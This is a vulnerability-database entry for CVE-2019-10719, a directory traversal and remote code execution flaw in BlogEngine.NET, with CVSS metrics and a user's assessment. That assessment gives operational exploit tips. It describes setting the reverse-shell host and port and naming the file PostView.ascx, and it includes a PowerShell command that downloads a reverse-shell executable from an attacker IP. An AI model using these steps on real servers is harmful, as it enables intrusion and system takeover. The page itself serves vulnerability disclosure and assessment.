Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
2

CVE-2019-10719

Disclosure Date: June 21, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Initial Access
Techniques
Validation
Validated

Description

BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714.

Add Assessment

3
Ratings
Technical Analysis

This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.

Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(”\(LHOST", \)LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others, this exploit creates a very unstable shell.
-The script should be named PostView.ascx

Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. –> powershell Invoke-WebRequest -Uri http://10.10.10.10:8888/reverse.exe -Outfile reverse.exe

CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • dotnetblogengine

Products

  • blogengine.net
Technical Analysis